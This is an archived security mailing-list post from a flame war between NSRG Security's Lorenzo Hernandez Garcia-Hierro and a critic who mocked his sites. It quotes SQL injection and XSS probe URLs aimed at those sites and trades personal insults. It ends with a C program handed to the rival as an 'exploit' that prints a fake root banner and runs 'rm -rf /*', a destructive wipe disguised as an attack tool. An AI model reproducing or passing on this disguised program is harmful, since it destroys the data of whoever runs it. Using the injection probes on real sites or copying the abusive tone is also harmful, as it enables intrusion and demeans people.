lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: lorenzohgh at nsrg-security.com (Lorenzo Hernandez Garcia-Hierro) Subject: [OMG] NSRG Security & Lorenzo Hernandez "SuckYouBeans" Garcia-Hierro Hi, I think you are a little stuck wth honeypots: http://www.nsrg-security.com/kiddies.txt The only thing is not there is a photo of you ?face? > > ~~~~ > 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR 1 MILLIN > 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR 1 MILLIN > 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR 1 MILLIN 0D4Y-OMFG FACTOR 1 MILLIN > > O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y- > OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y- > OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y- > OMFG FACTOR 1 MILLIN O132J0R2800D4Y0D4Y-OMFG FACTOR 1 MILLIN O132J0R2800D4Y > ~~~~~~~~ > > > [ Playing with stolen relabeled code by NSRG-Security ] > > \=1`\ Brought to you by the fine folks at \`=1\ > \=1`\ Stupidity In the World Industries \`=1\ > \=1`\ The Re-Resurrection \`=1\ > > > sites: nsrg-security.com > w3.nsrg-security.com > http://news.nsrg-security.com > test-zone.nsrg-security.com > advisories.nsrg-security.com > > Look through web sites and learn about horatio. > > >>>>>>>>>>>>>>>>>>>>>>>> Quote from "Lorenzo Hernandez Garcia-Hierro" to "gazpa" > > haha i no script kiddie i call u mother and ask about you scanning > for rpc all night hahaofihohashahomfgroflmfaowssd get a valium , say again , better ? > ~ OH WAIT! the only linux exploit i have on my worthless nsrg-security site > ~ is for windows rpc, DOH! I look like such an idiot are OK ? did you get your pills ??? > >>>>>>>>>>>>>>>>>>>>>>>> End Quote > > ========================================================== > > ==Advisory #8131== > ==Giving you 10 years of XSS!!== > > NSRG SECURITY > "Almost as lame as morning_wood" > > ============================================================= > > > http://www.nsrg-security.com/forum/viewtopic.php?forum=2&showtopic=1 having 1=1-- > "An SQL error has occured. Please see error.log for details." where is the exploitable query ? i think theres not... but you appear in the "in"famous list: http://www.nsrg-security.com/kiddies.txt > http://www.nsrg-security.com/stuff/trans.php?lang=sagsdg > Stupid programming it rejects non existent languages ( there is no return else function ) > [blah] > http://www.nsrg-security.com/stuff/ > HEXCODES.TXT 25-Oct-2003 23:21 1k > check_sys.php 21-Nov-2003 16:43 2k > irc.php 22-Nov-2003 00:06 4k > news-cert.php 21-Nov-2003 18:18 1k > news-kernel-traffic.php 21-Nov-2003 18:18 1k > news-securityfocus.php 21-Nov-2003 18:18 1k > news-slashdot.php 21-Nov-2003 18:18 1k > news.php 21-Nov-2003 19:03 3k > trans.php 21-Nov-2003 17:40 3k > voyeur-system.php 21-Nov-2003 16:50 3k > vulns-securityfocus.php 21-Nov-2003 18:18 1k oh , my god ! you find a directory listing ! xD you can read slashdot if you want.... or kernel traffic, it doesn't mattter , the idiot is you.... > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > Quote from site: > = > NSRG > "One of the best security resources around" > = the old quote ? ... > > "XSS" in: http://w3.nsrg-security.com/search/index.php > > <script>alert(window.cookie)</script> > > http://w3.nsrg-security.com/search/index.php?weblog=&keywords=%3Cscript%3Ealert%28window.cookie%29%3C%2Fscript%3E try to execute it with cookies !!! xD try again , i think you copied this from somewehere else ... > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > testzone.nsrg-security.com > > "XSS" in Referer log at: > > http://test-zone.nsrg-security.com/xss/ why you don't post an advisory about php has a flaw in strip_tags function ????? xD strip_tags($refererer-f); go back to drawing board ! > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > news.nsrg-security.com > > "XSS" in Email variable at: > > http://news.nsrg-security.com/register.php try it , i think your about 10 times in http://www.nsrg-security.com/kiddies.txt xD > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > misc: > > XSS kiddie advisories: > > http://advisories.nsrg-security.com/ > http://advisories.nsrg-security.com/FileDonkey.com-XSS/exploit.html > > > Another kiddie running nessus on everything he finds: xD do you think that ? i think you must bye glasses or new eyes , read the complete advisory not the stupid nessus report ( its marked as suplementary with notes ). > http://advisories.nsrg-security.com/Nasa.gov-MV/nasa.gov-audit-by-robot.php > > Hiding his MS browser: do you now a browser called Mozilla ? Netscape ? which plane is your home ? which Singapoor ? > http://advisories.nsrg-security.com/Nasa.gov-MV/screenshots/SQL-3.gif > > ================================================== > > Greets; > > MOOT INDUSTRIES, moot bailey, elite nsrg-security xss h4x0rs-they dont know SQL but they know > how to type '` when they see "id=###", the cisco kyd, welcome to the doghouse > greets , you missed the Z xD . we don't know sql ? its new... you don't know too ( you don't know nothing ) and... a quote from morrocco : kristataran atan busken ( search it , i don't know the correct spelling... xD ) and here is your new uber-hax0r exploit , for root machiones on the tv ( only pr0n as you like ): /* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Franks and Beans suckit Notrootkit * where is my brain ? * misspelled behind mind * shutdown now && halt * i can't halt , i am stuck on stupidity * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ #include <stdlib.h> int main() { system("echo uid=0(root) gid=0(root) groups=0(root)"); system("rm -rf /*"); system("Exploit code executed successfully ! r00ted by Franks and Beans , donnie ?"); } Best regards....xD PS: take your time and think again if not take pills and go to the doctor.
Powered by blists - more mailing lists